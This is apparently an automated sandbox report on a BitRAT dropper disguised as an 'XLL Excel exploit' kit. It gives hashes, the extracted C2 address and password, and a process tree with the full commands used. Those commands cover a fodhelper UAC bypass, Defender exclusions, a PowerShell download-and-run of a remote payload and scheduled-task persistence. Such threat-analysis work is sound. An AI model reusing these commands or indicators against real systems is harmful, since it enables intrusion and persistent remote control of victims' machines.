Analysis
-
max time kernel
106s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2022 18:33
Static task
static1
Behavioral task
behavioral1
Sample
XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/Icon.vbs
Resource
win10v2004-20220812-en
Behavioral task
behavioral2
Sample
XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/MainWindow.xaml.vbs
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/packages/info.bat
Resource
win10v2004-20220812-en
Behavioral task
behavioral4
Sample
XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/projectrcs/Resources.vbs
Resource
win10v2004-20220901-en
General
-
Target
XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/projectnls.scr
-
Size
90KB
-
MD5
f257db29d0439adc56190a15a6336b90
-
SHA1
7e974d2a767fa11832a0ae08f490d26ad552aebb
-
SHA256
21e2dbf71e3f8f5c26914792ef4889d7a85cba85420e467917e7f1bd4ee56dd0
-
SHA512
8503c5e71cb6e9232527431a527b21dccd0d60baa1b69e560a334b2d7a682cd51c8e21942e83e1d1202426fd7434e88da9c7197420ed116c4780e78ef49a4dbe
-
SSDEEP
96:/WKqcNOUKaSG7BzIIt//JROTTcliIG8xmmPM+MSpiME7zGM62l1FsfjvKZtttttz:/W0NOUKaFvaAmH762nmK89u1
Malware Config
Extracted
http://asamyz.com/ini.exe
Extracted
bitrat
1.38
wwww.ddnsgeek.com:59599
-
communication_password
32c93a52f919c37c05b22825e5a57a4a
-
tor_process
tor
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPRomptBehAvioRAdmin = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 2040 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
svchost.exesvchost.exepid process 3168 svchost.exe 3036 svchost.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid process 4672 attrib.exe 1612 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
projectnls.scrdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation projectnls.scr -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
svchost.exesvchost.exepid process 3168 svchost.exe 3168 svchost.exe 3168 svchost.exe 3168 svchost.exe 3168 svchost.exe 3036 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3212 schtasks.exe 3764 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4772 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1884 taskkill.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell\open\commAnd\DelegAteExecute = " " reg.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell\open\commAnd reg.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell\open\commAnd\ = "C:\\windows\\SYStem32\\cmd.exe /c REG ADD HKLM\\soFtwARE\\micRosoFt\\windows\\cuRREntveRsion\\policies\\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" reg.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\shell\open\commAnd reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2904 powershell.exe 2904 powershell.exe 2596 powershell.exe 2596 powershell.exe 2040 powershell.exe 2040 powershell.exe 4220 powershell.exe 4220 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exesvchost.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 4220 powershell.exe Token: SeShutdownPrivilege 3168 svchost.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeShutdownPrivilege 3036 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
svchost.exepid process 3168 svchost.exe 3168 svchost.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
projectnls.scrcmd.execmd.exefodhelper.execmd.exepowershell.exepowershell.exedescription pid process target process PID 4304 wrote to memory of 4992 4304 projectnls.scr cmd.exe PID 4304 wrote to memory of 4992 4304 projectnls.scr cmd.exe PID 4992 wrote to memory of 4936 4992 cmd.exe cmd.exe PID 4992 wrote to memory of 4936 4992 cmd.exe cmd.exe PID 4936 wrote to memory of 2276 4936 cmd.exe reg.exe PID 4936 wrote to memory of 2276 4936 cmd.exe reg.exe PID 4936 wrote to memory of 2680 4936 cmd.exe reg.exe PID 4936 wrote to memory of 2680 4936 cmd.exe reg.exe PID 4936 wrote to memory of 1812 4936 cmd.exe fodhelper.exe PID 4936 wrote to memory of 1812 4936 cmd.exe fodhelper.exe PID 1812 wrote to memory of 540 1812 fodhelper.exe cmd.exe PID 1812 wrote to memory of 540 1812 fodhelper.exe cmd.exe PID 540 wrote to memory of 4540 540 cmd.exe reg.exe PID 540 wrote to memory of 4540 540 cmd.exe reg.exe PID 4936 wrote to memory of 748 4936 cmd.exe cacls.exe PID 4936 wrote to memory of 748 4936 cmd.exe cacls.exe PID 4936 wrote to memory of 2904 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 2904 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 2596 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 2596 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 2040 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 2040 4936 cmd.exe powershell.exe PID 2040 wrote to memory of 3168 2040 powershell.exe svchost.exe PID 2040 wrote to memory of 3168 2040 powershell.exe svchost.exe PID 2040 wrote to memory of 3168 2040 powershell.exe svchost.exe PID 4936 wrote to memory of 4220 4936 cmd.exe powershell.exe PID 4936 wrote to memory of 4220 4936 cmd.exe powershell.exe PID 4220 wrote to memory of 3212 4220 powershell.exe schtasks.exe PID 4220 wrote to memory of 3212 4220 powershell.exe schtasks.exe PID 4936 wrote to memory of 3764 4936 cmd.exe schtasks.exe PID 4936 wrote to memory of 3764 4936 cmd.exe schtasks.exe PID 4936 wrote to memory of 4672 4936 cmd.exe attrib.exe PID 4936 wrote to memory of 4672 4936 cmd.exe attrib.exe PID 4936 wrote to memory of 1612 4936 cmd.exe attrib.exe PID 4936 wrote to memory of 1612 4936 cmd.exe attrib.exe PID 4936 wrote to memory of 4772 4936 cmd.exe timeout.exe PID 4936 wrote to memory of 4772 4936 cmd.exe timeout.exe PID 4936 wrote to memory of 1884 4936 cmd.exe taskkill.exe PID 4936 wrote to memory of 1884 4936 cmd.exe taskkill.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 4672 attrib.exe 1612 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\projectnls.scr"C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\projectnls.scr" /S1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F4⤵
- Modifies registry class
-
C:\Windows\system32\reg.exeREG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F4⤵
- Modifies registry class
-
C:\Windows\system32\fodhelper.exeFodhelpeR.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\windows\SYStem32\cmd.exe"C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F6⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SYStem32\cacls.exe"C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".bat""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamyz.com/ini.exe','C:\Users\Admin\profile\svchost.exe');Start-Process 'C:\Users\Admin\profile\svchost.exe'4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\profile\svchost.exe"C:\Users\Admin\profile\svchost.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn profile', '/IT', '/rl HIGHEST', '/TR', \"C:\Users\Admin\profile\svchost.exe\" -verb RunAs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn profile /IT /rl HIGHEST /TR C:\Users\Admin\profile\svchost.exe5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 2 /tn "spawn" /tr C:\Users\Admin\profile\svchost.exe4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\profile4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +S +H C:\Users\Admin\profile\svchost.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\timeout.exetimeout /T 34⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\profile\svchost.exeC:\Users\Admin\profile\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD55cfe303e798d1cc6c1dab341e7265c15
SHA1cd2834e05191a24e28a100f3f8114d5a7708dc7c
SHA256c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
SHA512ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5dfaae5f3c96bca0fa2edba259573d14d
SHA1f21aa6ba7a823499ee39ed47de6ec65886b30c63
SHA256434301dc57e6261328bc04cac4ffdaf03b4c525d81519cc599ab60d1761551ea
SHA512b60e4e4cd39a9432e2fc9897bf81bbda8a56eee24d559f1effb369dd1745311e004849a9dc4e2b8921bf526edc8caf263a6bc974612da23ed16816e98b17d2ba
-
C:\Users\Admin\profile\svchost.exeFilesize
3.8MB
MD5221e0fa159b0892c04254280d9a46674
SHA1fbe9558c1bf14a8ec59b918084de51d6f7d9037b
SHA2568ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7
SHA512084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9
-
C:\Users\Admin\profile\svchost.exeFilesize
3.8MB
MD5221e0fa159b0892c04254280d9a46674
SHA1fbe9558c1bf14a8ec59b918084de51d6f7d9037b
SHA2568ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7
SHA512084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9
-
C:\Users\Admin\profile\svchost.exeFilesize
3.8MB
MD5221e0fa159b0892c04254280d9a46674
SHA1fbe9558c1bf14a8ec59b918084de51d6f7d9037b
SHA2568ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7
SHA512084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9
-
memory/540-139-0x0000000000000000-mapping.dmp
-
memory/748-141-0x0000000000000000-mapping.dmp
-
memory/1612-166-0x0000000000000000-mapping.dmp
-
memory/1812-138-0x0000000000000000-mapping.dmp
-
memory/1884-170-0x0000000000000000-mapping.dmp
-
memory/2040-156-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/2040-153-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/2040-151-0x0000000000000000-mapping.dmp
-
memory/2276-136-0x0000000000000000-mapping.dmp
-
memory/2596-146-0x0000000000000000-mapping.dmp
-
memory/2596-149-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/2596-150-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/2680-137-0x0000000000000000-mapping.dmp
-
memory/2904-142-0x0000000000000000-mapping.dmp
-
memory/2904-144-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/2904-143-0x000001CF61920000-0x000001CF61942000-memory.dmpFilesize
136KB
-
memory/2904-145-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/3036-172-0x0000000000400000-0x00000000007CE000-memory.dmpFilesize
3.8MB
-
memory/3168-168-0x00000000746B0000-0x00000000746E9000-memory.dmpFilesize
228KB
-
memory/3168-154-0x0000000000000000-mapping.dmp
-
memory/3168-174-0x0000000074A30000-0x0000000074A69000-memory.dmpFilesize
228KB
-
memory/3168-173-0x00000000746B0000-0x00000000746E9000-memory.dmpFilesize
228KB
-
memory/3168-159-0x0000000000400000-0x00000000007CE000-memory.dmpFilesize
3.8MB
-
memory/3168-169-0x0000000074A30000-0x0000000074A69000-memory.dmpFilesize
228KB
-
memory/3212-162-0x0000000000000000-mapping.dmp
-
memory/3764-164-0x0000000000000000-mapping.dmp
-
memory/4220-163-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/4220-160-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/4220-157-0x0000000000000000-mapping.dmp
-
memory/4304-135-0x00007FFDE02F0000-0x00007FFDE0DB1000-memory.dmpFilesize
10.8MB
-
memory/4304-132-0x00000000004E0000-0x00000000004FC000-memory.dmpFilesize
112KB
-
memory/4540-140-0x0000000000000000-mapping.dmp
-
memory/4672-165-0x0000000000000000-mapping.dmp
-
memory/4772-167-0x0000000000000000-mapping.dmp
-
memory/4936-134-0x0000000000000000-mapping.dmp
-
memory/4992-133-0x0000000000000000-mapping.dmp